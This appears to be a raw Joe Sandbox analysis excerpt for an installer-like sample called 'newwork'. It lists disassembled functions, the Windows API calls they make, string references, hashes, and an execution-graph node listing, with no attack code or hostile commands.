                                                                                        • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                        • Opcode Fuzzy Hash: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                        • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                        • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                        • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                        • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                        • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                        • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                        • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                        • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                        • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                        • String ID:
                                                                                        • API String ID: 1694776339-0
                                                                                        • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                        • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                        • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                        • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                        APIs
                                                                                        • GetSystemDefaultLCID.KERNEL32(00000000,0040560C,?,?,?,?,00000000,00000000,00000000,?,004065EB,00000000,004065FE), ref: 004053DE
                                                                                          • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                          • Part of subcall function 00405258: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoLocale$DefaultSystem
                                                                                        • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                        • API String ID: 1044490935-665933166
                                                                                        • Opcode ID: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                        • Instruction ID: cc137df54ae1fcbb63b87987e69a719e9c27c4b31815d0debc5c9b1d2781c89a
                                                                                        • Opcode Fuzzy Hash: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                        • Instruction Fuzzy Hash: F8515374B00548ABDB00EBA59891A5F7769DB88304F50D5BBB515BB3C6CA3DCA058F1C
                                                                                        APIs
                                                                                        • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                        • LocalFree.KERNEL32(0070AB68,00000000,00401AB4), ref: 00401A1B
                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,0070AB68,00000000,00401AB4), ref: 00401A3A
                                                                                        • LocalFree.KERNEL32(0070BB68,?,00000000,00008000,0070AB68,00000000,00401AB4), ref: 00401A79
                                                                                        • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                        • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 3782394904-0
                                                                                        • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                        • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                        • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                        • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                        APIs
                                                                                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                        • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExitMessageProcess
                                                                                        • String ID: Error$Runtime error at 00000000$9@
                                                                                        • API String ID: 1220098344-1503883590
                                                                                        • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                        • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                        • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                        • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                        • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                        • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$AllocString
                                                                                        • String ID:
                                                                                        • API String ID: 262959230-0
                                                                                        • Opcode ID: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                        • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                        • Opcode Fuzzy Hash: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                        • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                        APIs
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,00409918,00000000), ref: 00406E4C
                                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: QueryValue
                                                                                        • String ID: )q@
                                                                                        • API String ID: 3660427363-2284170586
                                                                                        • Opcode ID: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                        • Instruction ID: 22a93fbabe645b78fd14ced98f65bd4bcb22fe3fd6f8222f7fa8e6a3c98f8dfc
                                                                                        • Opcode Fuzzy Hash: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                        • Instruction Fuzzy Hash: E6415E31D0021AAFDB21DF95C881BAFB7B8EB04704F56447AE901F7280D738AF108B99
                                                                                        APIs
                                                                                        • MessageBoxA.USER32(00000000,00000000,Setup,00000010), ref: 00409CBD
                                                                                        Strings
                                                                                        • Setup, xrefs: 00409CAD
                                                                                        • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si, xrefs: 00409CA1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message
                                                                                        • String ID: Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si
                                                                                        • API String ID: 2030045667-3271211647
                                                                                        • Opcode ID: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                        • Instruction ID: b8b600ed6bdfe48e96a015bdf4867c85bc36f5512d0f27a60c0f94c744360238
                                                                                        • Opcode Fuzzy Hash: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                        • Instruction Fuzzy Hash: 8EE0E5302482087EE311EA528C13F6A7BACE789B04F600477F900B15C3D6786E00A068
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(00000000,0040A60E), ref: 004030E3
                                                                                        • GetCommandLineA.KERNEL32(00000000,0040A60E), ref: 004030EE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CommandHandleLineModule
                                                                                        • String ID: U1hd.@
                                                                                        • API String ID: 2123368496-2904493091
                                                                                        • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                        • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                        • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                        • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 004094F7
                                                                                        • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409507
                                                                                        • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 0040951A
                                                                                        • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409524
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.3555582352.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.3555526841.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555640810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.3555715971.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLastSleep
                                                                                        • String ID:
                                                                                        • API String ID: 1458359878-0
                                                                                        • Opcode ID: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                        • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                        • Opcode Fuzzy Hash: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                        • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                                        Execution Graph

                                                                                        Execution Coverage:16%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:4.6%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:84
                                                                                        execution_graph 49945 40cd00 49946 40cd12 49945->49946 49947 40cd0d 49945->49947 49949 406f48 CloseHandle 49947->49949 49949->49946 49950 492848 49951 49287c 49950->49951 49952 49287e 49951->49952 49953 492892 49951->49953 50096 446f9c 32 API calls 49952->50096 49956 4928ce 49953->49956 49957 4928a1 49953->49957 49955 492887 Sleep 50049 4928c9 49955->50049 49962 49290a 49956->49962 49963 4928dd 49956->49963 50086 446ff8 49957->50086 49961 4928b0 49965 4928b8 FindWindowA 49961->49965 49968 492919 49962->49968 49969 492960 49962->49969 49964 446ff8 32 API calls 49963->49964 49966 4928ea 49964->49966 50090 447278 49965->50090 49970 4928f2 FindWindowA 49966->49970 50097 446f9c 32 API calls 49968->50097 49974 4929bc 49969->49974 49975 49296f 49969->49975 49972 447278 19 API calls 49970->49972 50036 492905 49972->50036 49973 492925 50098 446f9c 32 API calls 49973->50098 49981 492a18 49974->49981 49982 4929cb 49974->49982 50101 446f9c 32 API calls 49975->50101 49978 492932 50099 446f9c 32 API calls 49978->50099 49979 49297b 50102 446f9c 32 API calls 49979->50102 49992 492a52 49981->49992 49993 492a27 49981->49993 50106 446f9c 32 API calls 49982->50106 49984 49293f 50100 446f9c 32 API calls 49984->50100 49987 492988 50103 446f9c 32 API calls 49987->50103 49988 49294a SendMessageA 49991 447278 19 API calls 49988->49991 49989 4929d7 50107 446f9c 32 API calls 49989->50107 49991->50036 50004 492a61 49992->50004 50005 492aa0 49992->50005 49996 446ff8 32 API calls 49993->49996 49995 492995 50104 446f9c 32 API calls 49995->50104 49999 492a34 49996->49999 49997 4929e4 50108 446f9c 32 API calls 49997->50108 50006 492a3c RegisterClipboardFormatA 49999->50006 50001 4929a0 PostMessageA 50105 4470d0 19 API calls 50001->50105 50003 4929f1 50109 446f9c 32 API calls 50003->50109 50111 446f9c 32 API calls 50004->50111 50013 492aaf 50005->50013 50014 492af4 50005->50014 50009 447278 19 API calls 50006->50009 50009->50049 50010 4929fc SendNotifyMessageA 50110 4470d0 19 API calls 50010->50110 50011 492a6d 50112 446f9c 32 API calls 50011->50112 50114 446f9c 32 API calls 50013->50114 50021 492b48 50014->50021 50022 492b03 50014->50022 50016 492a7a 50113 446f9c 32 API calls 50016->50113 50019 492abb 50115 446f9c 32 API calls 50019->50115 50020 492a85 SendMessageA 50024 447278 19 API calls 50020->50024 50029 492b57 50021->50029 50035 492baa 50021->50035 50118 446f9c 32 API calls 50022->50118 50024->50036 50026 492ac8 50116 446f9c 32 API calls 50026->50116 50027 492b0f 50119 446f9c 32 API calls 50027->50119 50033 446ff8 32 API calls 50029->50033 50031 492ad3 PostMessageA 50117 4470d0 19 API calls 50031->50117 50037 492b64 50033->50037 50034 492b1c 50120 446f9c 32 API calls 50034->50120 50039 492bb9 50035->50039 50040 492c31 50035->50040 50036->50049 50122 42e394 SetErrorMode 50037->50122 50043 446ff8 32 API calls 50039->50043 50051 492c40 50040->50051 50052 492c66 50040->50052 50042 492b27 SendNotifyMessageA 50121 4470d0 19 API calls 50042->50121 50046 492bc8 50043->50046 50044 492b71 50047 492b87 GetLastError 50044->50047 50048 492b77 50044->50048 50125 446f9c 32 API calls 50046->50125 50053 447278 19 API calls 50047->50053 50050 447278 19 API calls 50048->50050 50136 403420 50049->50136 50054 492b85 50050->50054 50130 446f9c 32 API calls 50051->50130 50059 492c98 50052->50059 50060 492c75 50052->50060 50053->50054 50058 447278 19 API calls 50054->50058 50057 492c4a FreeLibrary 50131 4470d0 19 API calls 50057->50131 50058->50049 50069 492ca7 50059->50069 50075 492cdb 50059->50075 50063 446ff8 32 API calls 50060->50063 50061 492bdb GetProcAddress 50064 492c21 50061->50064 50065 492be7 50061->50065 50066 492c81 50063->50066 50129 4470d0 19 API calls 50064->50129 50126 446f9c 32 API calls 50065->50126 50071 492c89 CreateMutexA 50066->50071 50132 48ccc8 32 API calls 50069->50132 50070 492bf3 50127 446f9c 32 API calls 50070->50127 50071->50049 50074 492c00 50078 447278 19 API calls 50074->50078 50075->50049 50134 48ccc8 32 API calls 50075->50134 50077 492cb3 50080 492cc4 OemToCharBuffA 50077->50080 50079 492c11 50078->50079 50128 4470d0 19 API calls 50079->50128 50133 48cce0 19 API calls 50080->50133 50083 492cf6 50084 492d07 CharToOemBuffA 50083->50084 50135 48cce0 19 API calls 50084->50135 50087 447000 50086->50087 50140 436078 50087->50140 50089 44701f 50089->49961 50091 447280 50090->50091 50253 4363e0 VariantClear 50091->50253 50093 4472a3 50094 4472ba 50093->50094 50254 408c0c 18 API calls 50093->50254 50094->50049 50096->49955 50097->49973 50098->49978 50099->49984 50100->49988 50101->49979 50102->49987 50103->49995 50104->50001 50105->50036 50106->49989 50107->49997 50108->50003 50109->50010 50110->50049 50111->50011 50112->50016 50113->50020 50114->50019 50115->50026 50116->50031 50117->50036 50118->50027 50119->50034 50120->50042 50121->50049 50255 403738 50122->50255 50125->50061 50126->50070 50127->50074 50128->50036 50129->50036 50130->50057 50131->50049 50132->50077 50133->50049 50134->50083 50135->50049 50137 403426 50136->50137 50138 40344b 50137->50138 50139 402660 4 API calls 50137->50139 50139->50137 50141 436084 50140->50141 50151 4360a6 50140->50151 50141->50151 50160 408c0c 18 API calls 50141->50160 50142 436129 50169 408c0c 18 API calls 50142->50169 50144 436111 50164 403494 50144->50164 50145 436105 50145->50089 50146 4360f9 50155 403510 18 API calls 50146->50155 50147 4360ed 50161 403510 50147->50161 50148 43611d 50168 4040e8 32 API calls 50148->50168 50151->50142 50151->50144 50151->50145 50151->50146 50151->50147 50151->50148 50154 43613a 50154->50089 50159 436102 50155->50159 50157 436126 50157->50089 50159->50089 50160->50151 50170 4034e0 50161->50170 50166 403498 50164->50166 50165 4034ba 50165->50089 50166->50165 50167 402660 4 API calls 50166->50167 50167->50165 50168->50157 50169->50154 50175 4034bc 50170->50175 50172 4034f0 50180 403400 50172->50180 50176 4034c0 50175->50176 50177 4034dc 50175->50177 50184 402648 50176->50184 50177->50172 50179 4034c9 50179->50172 50181 403406 50180->50181 50182 40341f 50180->50182 50181->50182 50248 402660 50181->50248 50182->50089 50185 40264c 50184->50185 50187 402656 50184->50187 50190 402088 50185->50190 50186 402652 50186->50187 50201 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50186->50201 50187->50179 50187->50187 50191 40209c 50190->50191 50192 4020a1 50190->50192 50202 4019cc RtlInitializeCriticalSection 50191->50202 50194 4020c6 RtlEnterCriticalSection 50192->50194 50195 4020d0 50192->50195 50196 4020a5 50192->50196 50194->50195 50195->50196 50209 401f94 50195->50209 50196->50186 50199 4021f1 RtlLeaveCriticalSection 50200 4021fb 50199->50200 50200->50186 50201->50187 50203 4019f0 RtlEnterCriticalSection 50202->50203 50204 4019fa 50202->50204 50203->50204 50205 401a18 LocalAlloc 50204->50205 50206 401a32 50205->50206 50207 401a81 50206->50207 50208 401a77 RtlLeaveCriticalSection 50206->50208 50207->50192 50208->50207 50210 401fa4 50209->50210 50211 401fd0 50210->50211 50214 401ff4 50210->50214 50215 401f0c 50210->50215 50211->50214 50220 401db4 50211->50220 50214->50199 50214->50200 50224 40178c 50215->50224 50218 401f29 50218->50210 50221 401e02 50220->50221 50222 401dd2 50220->50222 50221->50222 50235 401d1c 50221->50235 50222->50214 50227 4017a8 50224->50227 50225 4014e4 LocalAlloc VirtualAlloc VirtualFree 50225->50227 50226 4017b2 50228 401678 VirtualAlloc 50226->50228 50227->50225 50227->50226 50229 40180f 50227->50229 50230 4013e0 LocalAlloc 50227->50230 50231 401803 50227->50231 50232 4017be 50228->50232 50229->50218 50234 401e80 9 API calls 50229->50234 50230->50227 50233 4015c0 VirtualFree 50231->50233 50232->50229 50233->50229 50234->50218 50236 401d2e 50235->50236 50237 401d51 50236->50237 50238 401d63 50236->50238 50239 401940 LocalAlloc VirtualFree VirtualFree 50237->50239 50240 401940 LocalAlloc VirtualFree VirtualFree 50238->50240 50241 401d61 50239->50241 50240->50241 50242 401d79 50241->50242 50243 401bf8 9 API calls 50241->50243 50242->50222 50244 401d88 50243->50244 50245 401da2 50244->50245 50246 401c4c 9 API calls 50244->50246 50247 401454 LocalAlloc 50245->50247 50246->50245 50247->50242 50249 402664 50248->50249 50250 40266e 50248->50250 50249->50250 50252 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50249->50252 50250->50182 50250->50250 50252->50250 50253->50093 50254->50094 50256 40373c LoadLibraryA 50255->50256 50256->50044 54022 498ba8 54080 403344 54022->54080 54024 498bb6 54083 4056a0 54024->54083 54026 498bbb 54086 40631c GetModuleHandleA GetProcAddress 54026->54086 54030 498bc5 54094 40994c 54030->54094 54361 4032fc 54080->54361 54082 403349 GetModuleHandleA GetCommandLineA 54082->54024 54085 4056db 54083->54085 54362 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54083->54362 54085->54026 54087 406338 54086->54087 54088 40633f GetProcAddress 54086->54088 54087->54088 54089 406355 GetProcAddress 54088->54089 54090 40634e 54088->54090 54091 406364 SetProcessDEPPolicy 54089->54091 54092 406368 54089->54092 54090->54089 54091->54092 54093 4063c4 6F551CD0 54092->54093 54093->54030 54363 409024 54094->54363 54361->54082 54362->54085 54364 408cbc 19 API calls 54363->54364 54365 409035 54364->54365 54366 4085dc GetSystemDefaultLCID 54365->54366 54370 408612 54366->54370 54367 408568 19 API calls 54367->54370 54368 403450 18 API calls 54368->54370 54369 406dec 19 API calls 54369->54370 54370->54367 54370->54368 54370->54369 54371 408674 54370->54371 54372 403450 18 API calls 54371->54372 54373 406dec 19 API calls 54371->54373 54374 408568 19 API calls 54371->54374 54375 4086f7 54371->54375 54372->54371 54373->54371 54374->54371 54376 403420 4 API calls 54375->54376 54377 408711 54376->54377 54378 408720 GetSystemDefaultLCID 54377->54378 54435 408568 GetLocaleInfoA 54378->54435 54381 403450 18 API calls 54382 408760 54381->54382 54383 408568 19 API calls 54382->54383 54384 408775 54383->54384 54385 408568 19 API calls 54384->54385 54386 408799 54385->54386 54441 4085b4 GetLocaleInfoA 54386->54441 54389 4085b4 GetLocaleInfoA 54390 4087c9 54389->54390 54391 408568 19 API calls 54390->54391 54392 4087e3 54391->54392 54393 4085b4 GetLocaleInfoA 54392->54393 54394 408800 54393->54394 54395 408568 19 API calls 54394->54395 54436 4085a1 54435->54436 54437 40858f 54435->54437 54438 403494 4 API calls 54436->54438 54439 4034e0 18 API calls 54437->54439 54440 40859f 54438->54440 54439->54440 54440->54381 54442 4085d0 54441->54442 54442->54389 55800 42f520 55801 42f52b 55800->55801 55802 42f52f NtdllDefWindowProc_A 55800->55802 55802->55801 50257 416b42 50258 416bea 50257->50258 50259 416b5a 50257->50259 50276 41531c 18 API calls 50258->50276 50261 416b74 SendMessageA 50259->50261 50262 416b68 50259->50262 50272 416bc8 50261->50272 50263 416b72 CallWindowProcA 50262->50263 50264 416b8e 50262->50264 50263->50272 50273 41a058 GetSysColor 50264->50273 50267 416b99 SetTextColor 50268 416bae 50267->50268 50274 41a058 GetSysColor 50268->50274 50270 416bb3 SetBkColor 50275 41a6e0 GetSysColor CreateBrushIndirect 50270->50275 50273->50267 50274->50270 50275->50272 50276->50272 55803 4358e0 55804 4358f5 55803->55804 55808 43590f 55804->55808 55809 4352c8 55804->55809 55814 435312 55809->55814 55820 4352f8 55809->55820 55810 403400 4 API calls 55811 435717 55810->55811 55811->55808 55822 435728 18 API calls 55811->55822 55812 446da4 18 API calls 55812->55820 55813 402648 18 API calls 55813->55820 55814->55810 55816 431ca0 18 API calls 55816->55820 55817 403450 18 API calls 55817->55820 55818 403744 18 API calls 55818->55820 55819 4038a4 18 API calls 55819->55820 55820->55812 55820->55813 55820->55814 55820->55816 55820->55817 55820->55818 55820->55819 55823 4343b0 55820->55823 55835 434b74 18 API calls 55820->55835 55822->55808 55824 43446d 55823->55824 55825 4343dd 55823->55825 55854 434310 18 API calls 55824->55854 55826 403494 4 API calls 55825->55826 55828 4343eb 55826->55828 55830 403778 18 API calls 55828->55830 55829 403400 4 API calls 55831 4344bd 55829->55831 55833 43440c 55830->55833 55831->55820 55832 43445f 55832->55829 55833->55832 55836 494944 55833->55836 55835->55820 55837 49497c 55836->55837 55838 494a14 55836->55838 55839 403494 4 API calls 55837->55839 55855 448930 55838->55855 55843 494987 55839->55843 55841 494997 55842 403400 4 API calls 55841->55842 55844 494a38 55842->55844 55843->55841 55845 4037b8 18 API calls 55843->55845 55846 403400 4 API calls 55844->55846 55848 4949b0 55845->55848 55847 494a40 55846->55847 55847->55833 55848->55841 55849 4037b8 18 API calls 55848->55849 55850 4949d3 55849->55850 55851 403778 18 API calls 55850->55851 55852 494a04 55851->55852 55853 403634 18 API calls 55852->55853 55853->55838 55854->55832 55856 448955 55855->55856 55857 448998 55855->55857 55858 403494 4 API calls 55856->55858 55859 4489ac 55857->55859 55867 44852c 55857->55867 55860 448960 55858->55860 55862 403400 4 API calls 55859->55862 55864 4037b8 18 API calls 55860->55864 55863 4489df 55862->55863 55863->55841 55865 44897c 55864->55865 55866 4037b8 18 API calls 55865->55866 55866->55857 55868 403494 4 API calls 